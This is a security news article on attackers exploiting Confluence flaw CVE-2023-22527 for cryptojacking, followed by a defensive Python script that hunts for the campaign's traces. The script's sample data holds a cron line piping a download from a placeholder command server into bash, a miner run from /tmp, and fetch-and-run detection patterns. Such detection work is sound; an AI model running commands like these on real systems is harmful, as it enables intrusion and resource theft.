Critical Atlassian Confluence Flaw Exploited for Cryptojacking

August 28, 2024

Threat actors are continuing to exploit a critical remote code execution (RCE) bug in Atlassian Confluence that was discovered in January. New attack vectors have emerged that convert targeted cloud environments into cryptomining networks. Trend Micro has identified two distinct attacks that leverage the vulnerability—known as CVE-2023-22527—in cryptojacking attacks that consume network resources. The Atlassian Confluence server is used for enterprise-level deployments, allowing teams and organizations to create, share, and collaborate on content. The bug was rated 10 out of 10 on the Common Vulnerability Scoring System (CVSS), indicating its high potential for exploitation in attacks ranging from ransomware to cyberespionage. Now, cryptojacking has been added to that list, eight months after the flaw's discovery and subsequent patching by Atlassian.

The attacks involve threat actors deploying shell scripts and XMRig miners, targeting SSH endpoints, killing competing cryptomining processes, and maintaining persistence via cron jobs. Trend Micro has observed thousands of attempts to exploit CVE-2023-22527 over the past few months and recommends that Confluence users who have not yet patched their environments do so as soon as possible. By exploiting CVE-2023-22527, an unauthenticated attacker can achieve template injection, enabling RCE on the affected instance.

Trend Micro identified three threat actors using the bug for cryptojacking attacks. In the first attack vector, the attackers exploited the flaw in the public-facing Confluence Server application to gain initial access to the environment, then executed the XMRig miner via an ELF payload, commandeering system resources. The second attack vector was more complex: a shell script spread the mining activity by running a shell file over Secure Shell (SSH) on every endpoint reachable in the customer environment. The attackers downloaded the shell file and ran it with bash from memory, then terminated all known cryptomining processes and any process running from /tmp/ directories. They also deleted all existing cron jobs and added a new one that runs every five minutes to check for command-and-control (C2) server communications. To evade detection, the attackers uninstalled security services such as Alibaba Cloud Shield and blocked the Alibaba Cloud Shield IP address.

The attackers identified the current machine's IP address and gathered data on all available users, IP addresses, and keys, using that information to target other remote systems via SSH for further cryptomining. After ensuring all cloud monitoring and security services were terminated or deleted, the attacker ended the entry-point process that exploits CVE-2023-22527 and downloaded the XMRig miner to begin mining. Once cryptomining began, the attackers removed all traces of their activity by clearing logs and bash history.
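The behaviours described above leave host-level traces that a responder can hunt for: a cron entry that fires every five minutes and pipes a download into a shell, processes whose command line references /tmp/, and a process named like the XMRig miner. The following Python script is an added example, not code from Trend Micro or from this article, that runs those three heuristics over crontab and `ps`-style listings. The listings are constructed samples, the C2 hostname and pool address are placeholders, and the extra scratch directories (/var/tmp/, /dev/shm/) are an assumption beyond the /tmp/ the article names.

```python
"""Host triage heuristics for the Confluence cryptojacking chain described above.
Added example; constructed inputs, not artifacts from the reported campaign."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    category: str  # "cron", "tmp_exec", or "miner"
    detail: str    # the offending line, kept verbatim for the analyst


# Constructed sample crontab. The C2 host is a placeholder (.invalid TLD).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * curl -fsSL http://c2.example.invalid/update.sh | bash
*/5 * * * * /usr/lib/sysstat/sa1 1 1
"""

# Constructed sample in `ps -eo pid,user,comm,args` layout; pool host is a placeholder.
SAMPLE_PROCESSES = """\
  PID USER       COMMAND  ARGS
    1 root       systemd  /sbin/init
 4312 confluence java     /opt/atlassian/confluence/jre/bin/java -Xms1024m
 5120 confluence xmrig    /tmp/.x/xmrig -o pool.example.invalid:3333
 5144 confluence bash     bash /tmp/sh.sh
"""

# A download tool whose output is piped straight into a shell.
FETCH_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da)?sh\b")
# Minute field of "*" (every minute) or "*/1" .. "*/5" (every 1-5 minutes).
HIGH_FREQUENCY_MINUTE = re.compile(r"^\*(/[1-5])?$")
# Scratch directories attackers commonly execute from; /tmp/ is from the article,
# the other two are an assumption.
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
MINER_NAMES = {"xmrig"}


def high_frequency(minute_field: str) -> bool:
    """True for a cron minute field that fires at least every five minutes."""
    return HIGH_FREQUENCY_MINUTE.match(minute_field) is not None


def scan_crontab(text: str) -> list[Finding]:
    """Flag high-frequency cron entries that fetch remote content into a shell."""
    findings: list[Finding] = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue  # not a five-field schedule (e.g. @reboot); out of scope here
        minute, command = parts[0], parts[5]
        if high_frequency(minute) and FETCH_AND_RUN.search(command):
            findings.append(Finding("cron", line))
    return findings


def scan_processes(text: str) -> list[Finding]:
    """Flag processes executing from scratch directories or named like a miner."""
    findings: list[Finding] = []
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        pid, user, comm, args = parts
        if any(tok.startswith(TMP_DIRS) for tok in args.split()):
            findings.append(Finding("tmp_exec", f"pid {pid} ({user}): {args}"))
        if comm.lower() in MINER_NAMES or any(n in args.lower() for n in MINER_NAMES):
            findings.append(Finding("miner", f"pid {pid} ({user}): {comm} {args}"))
    return findings


def triage(crontab: str, processes: str) -> list[Finding]:
    """Run every heuristic and return the combined findings."""
    return scan_crontab(crontab) + scan_processes(processes)


if __name__ == "__main__":
    for finding in triage(SAMPLE_CRONTAB, SAMPLE_PROCESSES):
        print(f"[{finding.category}] {finding.detail}")
```

On a live host the same functions can be fed the output of `crontab -l` for each user and `ps -eo pid,user,comm,args`; the cron heuristic deliberately ignores benign five-minute jobs that do not fetch anything, so the sysstat entry in the sample is not reported.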

Trend Micro suggests that staying up-to-date with bug patching for software, operating systems, and applications is the most effective way to prevent such vulnerabilities from being exploited. They also recommend network segmentation to reduce the impact of exploit-based attacks, regular security audits and vulnerability assessments to uncover and address weaknesses in infrastructure before an exploit occurs, and a solid incident response plan to ensure a swift and effective reaction in case of compromise.
